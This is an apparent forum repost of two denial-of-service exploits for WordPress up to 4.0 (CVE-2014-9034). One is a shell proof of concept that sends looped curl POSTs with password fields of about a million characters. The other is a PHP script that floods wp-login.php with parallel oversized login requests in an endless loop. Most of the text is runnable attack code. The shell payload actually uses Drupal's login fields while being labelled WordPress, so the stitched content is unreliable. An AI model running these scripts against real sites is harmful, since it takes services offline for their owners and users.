Wordpress < = 4.0 <4.0.1 - Denial of Service Exploit

[Aerosol]

Wordpress < 4.0.1 - Denial of Service

====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Wordpress < 4.0.1 allows an
attacker to send specially crafted requests resulting in CPU and memory
exhaustion. This may lead to the site becoming unavailable or
unresponsive (denial of service).

====================================================================
Time Line:
====================================================================

November 20, 2014 - A Wordpress security update and the security
advisory is published.

====================================================================
Proof of Concept:
====================================================================
Generate a pyaload and try with a valid user:

echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
{1..1000000} >> valid_user_payload && echo -n "&op=Log
in&form_id=user_login" >> valid_user_payload

Perform a Dos with a valid user:

for i in `seq 1 150`; do (curl --data  @valid_user_payload
[url]http://yoursite/wordpress/?q=user[/url] --silent > /dev/null &); sleep 0.5; done

====================================================================
Authors:
====================================================================

-- Javer Nieto -- [url]http://www.behindthefirewalls.com[/url]
-- Andres Rojas -- [url]http://www.devconsole.info[/url]

====================================================================
References:
====================================================================

* [url]https://wordpress.org/news/2014/11/wordpress-4-0-1/[/url]

* [url]https://www.drupal.org/SA-CORE-2014-006[/url]

*
[url]http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html[/url]

*
[url]http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html[/url]

* [url]http://www.devconsole.info/?p=1050[/url]

WordPress <=4.0 Denial of Service Exploit

<?php

echo "\nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability\n";
echo "Proof-of-Concept developed by john@secureli.com (http://secureli.com)\n\n";
echo "usage: php wordpressed.php domain.com username numberOfThreads\n";
echo " e.g.: php wordpressed.php wordpress.org admin 50\n\n";

echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " . $argv[1];

do {

$multi = curl_multi_init();
$channels = array();

for ($x = 0; $x < $argv[3]; $x++) {
    $ch = curl_init();

    $postData = array(
        'log' => $argv[2],
        'pwd' => str_repeat("A",1000000),
        'redirect_to' => $argv[1] . "/wp-admin/",
        'reauth' => 1,
        'testcookie' => '1',
        'wp-submit' => "Log%20In");

    $cookieFiles = "cookie.txt";

    curl_setopt_array($ch, array(
        CURLOPT_HEADER => 1,
        CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
        CURLOPT_REFERER => $argv[1] . "/wp-admin/",
        CURLOPT_COOKIEJAR => $cookieFiles,
        CURLOPT_COOKIESESSION => true,
        CURLOPT_URL => $argv[1] . '/wp-login.php',
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $postData,
        CURLOPT_FOLLOWLOCATION => true));

    curl_multi_add_handle($multi, $ch);

    $channels[$x] = $ch;
}

$active = null;

do {
    $mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);

while ($active && $mrc == CURLM_OK) {
    do {

        $mrc = curl_multi_exec($multi, $active);
    } while ($mrc == CURLM_CALL_MULTI_PERFORM);
}

foreach ($channels as $channel) {
    curl_multi_remove_handle($multi, $channel);
}

curl_multi_close($multi);
echo ".";
} while (1==1);

?>

WordPress <=4.0 Denial of Service Exploit

Wordpress < 4.0.1 - Denial of Service